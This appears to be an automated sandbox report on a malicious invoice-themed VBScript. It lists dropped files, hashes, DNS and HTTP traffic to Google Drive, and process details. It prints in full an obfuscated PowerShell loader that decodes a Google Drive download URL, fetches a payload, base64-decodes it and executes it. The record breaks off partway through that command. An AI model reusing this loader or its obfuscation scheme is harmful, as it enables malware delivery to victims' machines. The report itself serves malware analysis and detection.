                                  Preview:MSCF....i.......,...................I.................oXAy .authroot.stl.Ez..Q6..CK..<Tk...p.k..1...3...[..%Y.f..."K.6)..[*I.hOB."..rK.RQ*..}f..f...}....9.|.....gA...30.,O2L...0..%.U...U.t.....`dqM2.x..t...<(uad.c...x5V.x..t..agd.v......i...KD..q(. ...JJ......#..'=. ...3.x...}...+T.K..!.'.`w .!.x.r.......YafhG..O.3....'P[..'.D../....n..t....R<..=\E7L0?{..T.f...ID...,...r....3z..O/.b.Iwx.. .o...a\.s........."..'.......<;s.[...l...6.)ll..B.P.....k.... k0.".t!/.,........{...P8....B..0(.. .Q.....d...q,\.$.n.Q.\.p...R..:.hr./..8.S<a.s...+#3....D..h1.a.0....{.9.....:e.......n.~G.{.M.1..OU.....B.Q..y_>.P{...}i.=.a..QQT.U..|!.pyCD@.....l..70..w..)...W^.`l...%Y.\................i..=hYV.O8W@P.=.r.=..1m..1....)\.p..|.c.3..t..[...).....l.{.Y....\S.....y....[.mCt....Js;...H....Q..F.....g.O...[..A.=...F[..z....k...mo.lW{`....O...T.g.Y.Uh.;m.'.N..f..}4..9i..t4p_bI..`.....Ie..l.P.... ...Lg......[....5g...~D.s.h'>n.m.c.7...-..P.gG...i$...v.m.b[.yO.P/*.YH.
                                  Process:C:\Windows\System32\wscript.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):330
                                  Entropy (8bit):3.223566515555164
                                  Encrypted:false
                                  SSDEEP:6:kKglEN+SkQlPlEGYRMY9z+4KlDA3RUeVlWI/Vt:YlbkPlE99SNxAhUeVLVt
                                  MD5:C8362B314414FD8CCA682F001E87EDB8
                                  SHA1:E53A670B4CEA3AD3DA6941B52D5A6B20977112D0
                                  SHA-256:3C8C8D1BB778808877F2470A433A5502D785E7E0447F2E5AFE7BEB4ACD81C25B
                                  SHA-512:E0FB8E271C1A2215258E0B46BAFFF101BA22AB45F45390D8A3E8A558E413BFB89229B8057CAE287B2819115096DFE2945451F0B29BB0651863946FA41D13F06B
                                  Malicious:false
                                  Reputation:low
                                  Preview:p...... ........}..o...(....................................................... ........M.........(.....wl....i...h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".b.3.6.8.5.3.8.5.a.4.7.f.d.a.1.:.0."...
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):64
                                  Entropy (8bit):1.1940658735648508
                                  Encrypted:false
                                  SSDEEP:3:Nlllulbnolz:NllUc
                                  MD5:F23953D4A58E404FCB67ADD0C45EB27A
                                  SHA1:2D75B5CACF2916C66E440F19F6B3B21DFD289340
                                  SHA-256:16F994BFB26D529E4C28ED21C6EE36D4AFEAE01CEEB1601E85E0E7FDFF4EFA8B
                                  SHA-512:B90BFEC26910A590A367E8356A20F32A65DB41C6C62D79CA0DDCC8D95C14EB48138DEC6B992A6E5C7B35CFF643063012462DA3E747B2AA15721FE2ECCE02C044
                                  Malicious:false
                                  Reputation:moderate, very likely benign file
                                  Preview:@...e................................................@..........
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Reputation:high, very likely benign file
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Reputation:high, very likely benign file
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:HTML document, ASCII text, with very long lines (1692), with no line terminators
                                  Category:dropped
                                  Size (bytes):1692
                                  Entropy (8bit):5.110940634804961
                                  Encrypted:false
                                  SSDEEP:24:hazsppqhlvhXlhEG0qnXXX08Ucq9J8mZoWHMzj+cB7jTsoT9FyVZ81wmna:7p4vmRq+fjsueFYaWJ
                                  MD5:63F98CDF24083ABD8462B7E9D92C928F
                                  SHA1:CC97CAF1083749B183167376457AF74A2D46A5E5
                                  SHA-256:A60F00E9D800C6A479A51CA2CC5FB56B05D98CEE967597EC373DBC115FD405FF
                                  SHA-512:278CDF24E26C0C2EC9E9B8F8B92AB7B5279D0043019B349D436FA5533E42DC1454C786B24B5D4B4C3F59C54E1FB70AF6E1DCC2FE775BF80F7EE65D816BA42EE8
                                  Malicious:false
                                  Reputation:low
                                  Preview:<!DOCTYPE html><html><head><title>Google Drive - Infected file</title><meta http-equiv="content-type" content="text/html; charset=utf-8"/><style nonce="hMLA-B717nPeW5UPzK3MyA">.goog-link-button{position:relative;color:#15c;text-decoration:underline;cursor:pointer}.goog-link-button-disabled{color:#ccc;text-decoration:none;cursor:default}body{color:#222;font:normal 13px/1.4 arial,sans-serif;margin:0}.grecaptcha-badge{visibility:hidden}.uc-main{padding-top:50px;text-align:center}#uc-dl-icon{display:inline-block;margin-top:16px;padding-right:1em;vertical-align:top}#uc-text{display:inline-block;max-width:68ex;text-align:left}.uc-error-caption,.uc-warning-caption{color:#222;font-size:16px}#uc-download-link{text-decoration:none}.uc-name-size a{color:#15c;text-decoration:none}.uc-name-size a:visited{color:#61c;text-decoration:none}.uc-name-size a:active{color:#d14836;text-decoration:none}.uc-footer{color:#777;font-size:11px;padding-bottom:5ex;padding-top:5ex;text-align:center}.uc-footer a{colo
                                  File type:ASCII text, with CRLF line terminators
                                  Entropy (8bit):5.254388946138046
                                  TrID:
                                  • Visual Basic Script (13500/0) 100.00%
                                  File name:FACTURA 130424435.vbs
                                  File size:215'828 bytes
                                  MD5:361f71c64cdcf7f56f8e6c2389401b89
                                  SHA1:315b4b37555a2b0f82837a94753fbd36bad2f5fd
                                  SHA256:dbc99b1d313999e21fd15d8386d69d56067c2a578c9658fbff8f749e93f04eae
                                  SHA512:039b1f1f368568c37a674a7fca0a6d2d9e1944787aff7b8292f3e563b9ec1c0af59f70c29072862d0110c40eba008f1f6c0e01c39040d3dbcb636fba1d33e652
                                  SSDEEP:6144:KYBgIjQvrMbWSR4WHUJJs9E87Fy4lZrUChpqKmjum4QlNVrDjXR46cCPCRJfyq30:P2dONnpu
                                  TLSH:2D2408F0DF0B36199F5B3EDAAC6445924AF84195051238B5AAD817ECB283D2CE3FDD18
                                  File Content Preview:..'Lollup kystvagt? newscasters195: wirrah: premade..'fernbrake; overdominating dures forsgsordnings?..'Rashnesses; ulykkesfuglene depositive stimulansers72..'Makroerne bidery? typewrote..'Jagtbderne nonleprous..'Dateringsforsgets128, maries:.. ..'Tordenb
                                  Icon Hash:68d69b8f86ab9a86
                                  TimestampSource PortDest PortSource IPDest IP
                                  Apr 18, 2024 11:05:57.021472931 CEST49706443192.168.2.8142.250.105.102
                                  Apr 18, 2024 11:05:57.021514893 CEST44349706142.250.105.102192.168.2.8
                                  Apr 18, 2024 11:05:57.022547007 CEST49706443192.168.2.8142.250.105.102
                                  Apr 18, 2024 11:05:57.030757904 CEST49706443192.168.2.8142.250.105.102
                                  Apr 18, 2024 11:05:57.030776978 CEST44349706142.250.105.102192.168.2.8
                                  Apr 18, 2024 11:05:57.261363983 CEST44349706142.250.105.102192.168.2.8
                                  Apr 18, 2024 11:05:57.261574984 CEST49706443192.168.2.8142.250.105.102
                                  Apr 18, 2024 11:05:57.262305975 CEST44349706142.250.105.102192.168.2.8
                                  Apr 18, 2024 11:05:57.262387991 CEST49706443192.168.2.8142.250.105.102
                                  Apr 18, 2024 11:05:57.267508984 CEST49706443192.168.2.8142.250.105.102
                                  Apr 18, 2024 11:05:57.267517090 CEST44349706142.250.105.102192.168.2.8
                                  Apr 18, 2024 11:05:57.267790079 CEST44349706142.250.105.102192.168.2.8
                                  Apr 18, 2024 11:05:57.280270100 CEST49706443192.168.2.8142.250.105.102
                                  Apr 18, 2024 11:05:57.328114033 CEST44349706142.250.105.102192.168.2.8
                                  Apr 18, 2024 11:05:57.511917114 CEST44349706142.250.105.102192.168.2.8
                                  Apr 18, 2024 11:05:57.512335062 CEST44349706142.250.105.102192.168.2.8
                                  Apr 18, 2024 11:05:57.512500048 CEST49706443192.168.2.8142.250.105.102
                                  Apr 18, 2024 11:05:57.515104055 CEST49706443192.168.2.8142.250.105.102
                                  Apr 18, 2024 11:05:57.631247044 CEST49707443192.168.2.8173.194.219.132
                                  Apr 18, 2024 11:05:57.631283998 CEST44349707173.194.219.132192.168.2.8
                                  Apr 18, 2024 11:05:57.631431103 CEST49707443192.168.2.8173.194.219.132
                                  Apr 18, 2024 11:05:57.631927013 CEST49707443192.168.2.8173.194.219.132
                                  Apr 18, 2024 11:05:57.631942034 CEST44349707173.194.219.132192.168.2.8
                                  Apr 18, 2024 11:05:57.879102945 CEST44349707173.194.219.132192.168.2.8
                                  Apr 18, 2024 11:05:57.879278898 CEST49707443192.168.2.8173.194.219.132
                                  Apr 18, 2024 11:05:57.882472038 CEST49707443192.168.2.8173.194.219.132
                                  Apr 18, 2024 11:05:57.882484913 CEST44349707173.194.219.132192.168.2.8
                                  Apr 18, 2024 11:05:57.882771969 CEST44349707173.194.219.132192.168.2.8
                                  Apr 18, 2024 11:05:57.883816957 CEST49707443192.168.2.8173.194.219.132
                                  Apr 18, 2024 11:05:57.928124905 CEST44349707173.194.219.132192.168.2.8
                                  Apr 18, 2024 11:05:58.585520983 CEST44349707173.194.219.132192.168.2.8
                                  Apr 18, 2024 11:05:58.585573912 CEST44349707173.194.219.132192.168.2.8
                                  Apr 18, 2024 11:05:58.585635900 CEST44349707173.194.219.132192.168.2.8
                                  Apr 18, 2024 11:05:58.587146044 CEST49707443192.168.2.8173.194.219.132
                                  Apr 18, 2024 11:05:58.587146044 CEST49707443192.168.2.8173.194.219.132
                                  Apr 18, 2024 11:05:58.588133097 CEST49707443192.168.2.8173.194.219.132
                                  TimestampSource PortDest PortSource IPDest IP
                                  Apr 18, 2024 11:05:56.909962893 CEST5525853192.168.2.81.1.1.1
                                  Apr 18, 2024 11:05:57.014674902 CEST53552581.1.1.1192.168.2.8
                                  Apr 18, 2024 11:05:57.517302990 CEST6065553192.168.2.81.1.1.1
                                  Apr 18, 2024 11:05:57.622591019 CEST53606551.1.1.1192.168.2.8
                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                  Apr 18, 2024 11:05:56.909962893 CEST192.168.2.81.1.1.10xbf33Standard query (0)drive.google.comA (IP address)IN (0x0001)false
                                  Apr 18, 2024 11:05:57.517302990 CEST192.168.2.81.1.1.10x8fc8Standard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false
                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                  Apr 18, 2024 11:05:53.672084093 CEST1.1.1.1192.168.2.80x5159No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                  Apr 18, 2024 11:05:53.672084093 CEST1.1.1.1192.168.2.80x5159No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                  Apr 18, 2024 11:05:57.014674902 CEST1.1.1.1192.168.2.80xbf33No error (0)drive.google.com142.250.105.102A (IP address)IN (0x0001)false
                                  Apr 18, 2024 11:05:57.014674902 CEST1.1.1.1192.168.2.80xbf33No error (0)drive.google.com142.250.105.138A (IP address)IN (0x0001)false
                                  Apr 18, 2024 11:05:57.014674902 CEST1.1.1.1192.168.2.80xbf33No error (0)drive.google.com142.250.105.113A (IP address)IN (0x0001)false
                                  Apr 18, 2024 11:05:57.014674902 CEST1.1.1.1192.168.2.80xbf33No error (0)drive.google.com142.250.105.101A (IP address)IN (0x0001)false
                                  Apr 18, 2024 11:05:57.014674902 CEST1.1.1.1192.168.2.80xbf33No error (0)drive.google.com142.250.105.100A (IP address)IN (0x0001)false
                                  Apr 18, 2024 11:05:57.014674902 CEST1.1.1.1192.168.2.80xbf33No error (0)drive.google.com142.250.105.139A (IP address)IN (0x0001)false
                                  Apr 18, 2024 11:05:57.622591019 CEST1.1.1.1192.168.2.80x8fc8No error (0)drive.usercontent.google.com173.194.219.132A (IP address)IN (0x0001)false
                                  • drive.google.com
                                  • drive.usercontent.google.com
                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  0192.168.2.849706142.250.105.1024431644C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  TimestampBytes transferredDirectionData
                                  2024-04-18 09:05:57 UTC215OUTGET /uc?export=download&id=10njVWCq2qkMZzklkAMXZ6T15jTP2RkbH HTTP/1.1
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                  Host: drive.google.com
                                  Connection: Keep-Alive
                                  2024-04-18 09:05:57 UTC1582INHTTP/1.1 303 See Other
                                  Content-Type: application/binary
                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                  Pragma: no-cache
                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                  Date: Thu, 18 Apr 2024 09:05:57 GMT
                                  Location: https://drive.usercontent.google.com/download?id=10njVWCq2qkMZzklkAMXZ6T15jTP2RkbH&export=download
                                  Strict-Transport-Security: max-age=31536000
                                  Content-Security-Policy: script-src 'nonce-VA2ydqPgiAvEEJ5rLzDDXw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                  Content-Security-Policy: script-src 'unsafe-inline' 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                  Cross-Origin-Opener-Policy: same-origin
                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factor=*, ch-ua-platform=*, ch-ua-platform-version=*
                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factor, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                  Server: ESF
                                  Content-Length: 0
                                  X-XSS-Protection: 0
                                  X-Frame-Options: SAMEORIGIN
                                  X-Content-Type-Options: nosniff
                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                  Connection: close


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  1192.168.2.849707173.194.219.1324431644C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  TimestampBytes transferredDirectionData
                                  2024-04-18 09:05:57 UTC233OUTGET /download?id=10njVWCq2qkMZzklkAMXZ6T15jTP2RkbH&export=download HTTP/1.1
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                  Host: drive.usercontent.google.com
                                  Connection: Keep-Alive
                                  2024-04-18 09:05:58 UTC2121INHTTP/1.1 200 OK
                                  X-GUploader-UploadID: ABPtcPpy4_WIXYOBACK1AWzYA1uTvreMVu83xlcPefDHDmvr_tuHOMEpGh6pv3RsVNHEBweeIBE
                                  Content-Type: text/html; charset=utf-8
                                  Vary: Sec-Fetch-Dest, Sec-Fetch-Mode, Sec-Fetch-Site
                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                  Pragma: no-cache
                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                  Date: Thu, 18 Apr 2024 09:05:58 GMT
                                  P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                  Content-Security-Policy: script-src 'nonce-pMhLY47FLqWRumbgjxR-yw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                  Content-Security-Policy: script-src 'unsafe-inline' 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factor, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                  Cross-Origin-Resource-Policy: same-site
                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factor=*, ch-ua-platform=*, ch-ua-platform-version=*
                                  Cross-Origin-Opener-Policy: same-origin
                                  reporting-endpoints: default="/_/DriveUntrustedContentHttp/web-reports?context=eJzj0tDikmJw0ZBisN47ndUeiJ3SZ7CGAPHqn-dY1wPx4rDzrCuAWIiH49uR5o1sAie2dv1hBAAKNhWQ"
                                  Content-Length: 1692
                                  Server: UploadServer
                                  Set-Cookie: NID=513=CjoaiVM7Jt10yNX6Fd5n-6uRX1uozZVUMTnLRy33jUP8K_xkb2-WpvkLp7rYjPu2liTKKl2zdawF0QbyrHUAWSypV8O8LX29llVg_QbyeQvGJkkRE3fdBoD_yL1xOi-nt61gzgRPfJWfvSHStRsR_PKwKiXKKTZDwCGn8l4Dr54; expires=Fri, 18-Oct-2024 09:05:58 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                  Content-Security-Policy: sandbox allow-scripts
                                  Connection: close
                                  2024-04-18 09:05:58 UTC1692INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 47 6f 6f 67 6c 65 20 44 72 69 76 65 20 2d 20 49 6e 66 65 63 74 65 64 20 66 69 6c 65 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 2f 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 68 4d 4c 41 2d 42 37 31 37 6e 50 65 57 35 55 50 7a 4b 33 4d 79 41 22 3e 2e 67 6f 6f 67 2d 6c 69 6e 6b 2d 62 75 74 74 6f 6e 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6f 6c 6f 72 3a 23 31 35 63 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 3b 63 75 72 73 6f 72
                                  Data Ascii: <!DOCTYPE html><html><head><title>Google Drive - Infected file</title><meta http-equiv="content-type" content="text/html; charset=utf-8"/><style nonce="hMLA-B717nPeW5UPzK3MyA">.goog-link-button{position:relative;color:#15c;text-decoration:underline;cursor


                                  Click to jump to process

                                  Click to jump to process

                                  Click to dive into process behavior distribution

                                  Click to jump to process

                                  Target ID:0
                                  Start time:11:05:52
                                  Start date:18/04/2024
                                  Path:C:\Windows\System32\wscript.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\FACTURA 130424435.vbs"
                                  Imagebase:0x7ff68f2f0000
                                  File size:170'496 bytes
                                  MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  Target ID:2
                                  Start time:11:05:54
                                  Start date:18/04/2024
                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Epidydimus = 1;$Painters21='Substrin';$Painters21+='g';Function Antimeningococcic($gejstligt){$Nosher=$gejstligt.Length-$Epidydimus;For($Antisnapper=5; $Antisnapper -lt $Nosher; $Antisnapper+=(6)){$taxmen+=$gejstligt.$Painters21.Invoke($Antisnapper, $Epidydimus);}$taxmen;}function cairned($Fremvisningen){. ($Chantors) ($Fremvisningen);}$Veteraness=Antimeningococcic 'ManitMNeph,oNringzregili.hiotlAspirlMet.raKlis,/ Un.e5Svam,. Afvi0Bryde Hjlp(ThundWFemmliKoo.dnServidAlkohoVetuswGlaiesTaare TtsluNDdfdsTOvern erhve1Ambas0 vatp.Therm0Quito;Caul Nonl WLinieiRe,ubnCarah6Feabe4Finia;Malac .apeixL,lla6Re,ro4Ungar;Pre.n NoterGastrvAgmas:bazzi1Tr.me2 Neph1Spe,l.N ter0Sev.r)Velve RepriG CelievasalcChon.kPampaorecta/Okkup2Prs,r0Radom1Entoc0Vov,d0Nonst1Hemag0,aama1 ksam FamilFUdadriRidgir NotceCh.llfCenoso .rorxCoons/ Warn1F.mte2Skede1Udgif.Ties.0Solip ';$Maskinafdelinger=Antimeningococcic 'IndviU,ablesDomineBrou,r Blok-TabifAnuculgSeksee ,ccenHandbtOutbu ';$Trngendes=Antimeningococcic ' AlpehDurditAfbrytTagliphabilsKal,i:Super/Dee,d/Feticd Showr CymoiLokalvReheae lant. Tvrfg tjsvo Flado ResogSe,iclSaf,aeSpiro.Lnpolc GilloNive mUntan/c viluPate cWa,tr?SmelteConquxSp itpSta,doServir O.ert ramp=BoldhdGeon.ogriotw IndknTromllAffreo diskaUdmand.orti&PhylliDe.rwdTaint=Nonp,1 Pinn0InddanAktivj LarmVKoombWCatalCbn.elqag.ip2 Undeq kos kNonreM.anscZ eddyzMiniakArticlAfkogk PoveAArdeaM WiseX,alinZVenge6Epit TPenge1Recla5,entrjVek,lTLevneP nder2 glycRVinhakRaakrbSamfuHPont. ';$Skulapstavs=Antimeningococcic 'Delig>Crash ';$Chantors=Antimeningococcic 'FlymeiMasoneHash.xShei ';$Anniversariness = Antimeningococcic 'no.mae Sta,cBassoh.gpaaoUdv.k Symp% Wi,daS,mfupMisr,pMedendHa niaSystetOverfaMotst% .ryd\BadesCAnt.caBe alb .esaa,repssHuskesMalguoForesuEvolu.FungiTStatsuPoundnOpst Palae&disku&Chain cretaeRadiocSarcohBegrao Arar Anato$Divis ';cairned (Antimeningococcic 'Unim $Afvu,gHenk,lOve eoGallib PreaaExinglHilbe:LlebrT,entroFort s PahacOversaRamifn Ana aOmski=Tor i(AntalcAc.mpmIdeendTalel Nylon/rif,ec Vamb korru$ AgarA sychnWinten Phoniho otvdeltaeRudelrAvilasG lioa,kalmrBastkiAa,eknSol.reFortrsBlocks .agr)Subpr ');cairned (Antimeningococcic ' oshy$MoblegS.kofl Fac,o VocabTrst aKonomlPipin:,elchLtidssyCellanO,iefn For eBrnd dSynodsSaddelA.iata,orbrgrevesePreasnGaranedesi.s Anjo1Sku k6Black=Affal$ KommTSae nrE,astnNedrigAiluregodsen.rypad TerreLdigesUnref.BjergsEk,popJorddlA retiStrantManag(Cuber$B gaeSCarlyk Counu R,tulSlacka TriapFucussLancetLampeaNeutrvSa mesTral.)Septa ');$Trngendes=$Lynnedslagenes16[0];cairned (Antimeningococcic '.ubgo$EpiskgIn.asl ,tamoSuprab Infoa.esoelThe,r:FniscM.echaeOpkrvtAerataKretslH,elclGaussiSub efRegalaRic.icsh oott.geru.irkerBeco e Anar= Afg NForgre DryrwAuric-Anlg OAm hibtangajFs,ebe AmulcHvalptGroun FriedST nefyForfasEngratBlodmeThrummortho. aludNpropoeDomsttPa ad.AgouaWJobb eFletsbSamliC appllChis.i ErkleBogbin .liftPr,oc ');cairned (Antimeningococcic ' Di,t$JochuM,uktieButtytSvagha Hus,lTronplKultuiSugenftod laudvikcMerist HoveuMa,kirsextuePl.st.SekteHSkovbeTilbjaBe.ald matee Stalr.rivasSyzy [ Fusi$ zithM BaroaBaaddsRetiak onciStradnSpdbraA,odifDriftdLgdereH,brilKthibiT.kepnVggengVersieIdiotrLsten] Anth=Cytop$Muls.VInequeFyrintBo.hoe indirOpga.aEri.cnBolige Res s nysks ande ');$Demonstrerbares212=Antimeningococcic ' DeliM sildeGavebt Bomba pre,lProdul Medli TrstfOutpoaEduc cPlesktFootsu D ferCompleRefer.Spin,DPanscoMultiw PercnWindslBevbnoEpictaungdodTjeneF Edr ichabolUndereSlagb(Sub,e$FaenoTischirButo,nunireg PlejeBegrunNonskdAffe.eCutarsScimi,El.os$ ulvSkondes ombyte eazeSkarlrPredes otakEctopiFodb,belekteAttessB,ase) Bucc ';$Demonstrerbares212=$Toscana[1]+$Demonstrerbares212;$Ssterskibes=$Toscana[0];cairned (Antimeningococcic 'Sub a$Anflyg mpilun.ino SkrabSjuskaGalehlData,:BaglaSTripovProluoHe tyvInterlBarrapSaliclTro,seA jur= R ad(FgridTUnpa eAfknasTiaart Ster-enthrPSeizuaScopetItalihbegso Polyg$Err.tS,horesRetartStipeeMicrorGenfosminimkChattiStrikbKojaneDukkes ive)ka,ve ');while (!$Svovlple) {cairned (Antimeningococcic ' Sona$ Bi lgEpexelOmbygoS mpabMisc,aHervalTharb:Milkwa Uncel LedilFors.eMegawrA bilgBrystiEnd rsTubulkUndereJusti=Tragi$ ForltAffekr petiuUdbenefrer. ') ;cairned $Demonstrerbares212;cairned (Antimeningococcic 'VitelSb,odetCapitaThougrWispltBadel-FiberS IntelL ftfeFibroe PartpUindf D.age4Akter ');cairned (Antimeningococcic ' Svar$ForsygO tstl.orbioPla sbAccelaAm,lelBegga:C,ndeSBotanvPirrio orgivHrecelHeb,opHyperlQuotee ,ltr=Skvad(HolomTBordvetrapdsFlaprt cica-panatPC.eriaRser.tg,lloh Dis Ratem$B.skaS .etssOm,egt Patce.hamarBordesMiddekUdforiS ndebGast e I,dgs un o)Overl ') ;cairned (Antimeningococcic 'A ter$huffmg BrnelVindko alkubsvmmeaPe.fol,ikol:Overgb undeu HassgDroutsHlhjde,ortyrBlaaseS,kketBostt=Optak$ fa cg SvoglTaurooForhobLame.aTeknolWesse:SpaniH Le.evUninviGa.indFrikttJordsnReacciLysesnCl,mog ournecandlrReshanBortfePakke+Pecha+By el% Ndud$ NoniLU plyyMessin StrenIncineCentedT rbasHypoclEnfana PhysgVenipeTrag npseu,e,transConfe1Unhe,6 Span.Grif,cHaando MannuTjrslnGunsttPrpar ') ;$Trngendes=$Lynnedslagenes16[$bugseret];}cairned (Antimeningococcic 'Tilba$CatapgDejeclWaysioContobErgoma Mot lBandl:NonreC licehHurtir Lg,koDulutmApproeT ivlpmeddllSan taTh,matUncu.eOve.rdBasal atro = Alis OrddaGBak.de MidttRicke-BlafrCPrecioreh.bnflappt Pas,e,aedanDudlettrprv Unart$PrismSMalaxsMeliot Carbe,onfor Appesstay k SamoiMarrob Supee phars A in ');cairned (Antimeningococcic 'T.rap$PraedgVlgerlUnprooBuks.bSta,sasoc,olFl,me:,ichlD Kropo Slagedermo Anglo=Pru.t ,romi[Squi.S SmalyForslsM liet heateF rtimDunde. TroeCTinfooP litnChubbv ammeeLder,r C.nvtSl,ve].olyc:smelt: S.brF JenbrPompsosognemOctoaB MezuaDriftsEmblee Debi6Besky4Caco,S ispetGlendr Gr diChantn,raktg Shop(Au or$S steCCumbrh DisprK.ldkoRescimOdileeVr,iapC taglOmegnaSanittConfeePirkldAro.a)Zoril ');cairned (Antimeningococcic ' U,fl$Snickg Belul.annioC.rysbdefa,aTrvarlPreco: OmelWBrutaiZa.zutSchtihGenaunPrinsaCont,y Ugen Omar.=Aconi Drows[AreteSUdby yZi,zasTr.klt OvereAnthrmFje.n. ilbuTTaggeeNarcox .vertSa sr. Kon.EBochen SkelcSt,rnoReexpdbi.oiiPre onPaga gefter]Scra :Samti:J venAHerreSunderCth.rmIC iasIIrked. OverGMicroe .nditInspiSLd,amt Pla,rTussoiparamnHet,agJordl( Afme$ LageD Hytvo gelsebaand)Spytk ');cairned (Antimeningococcic 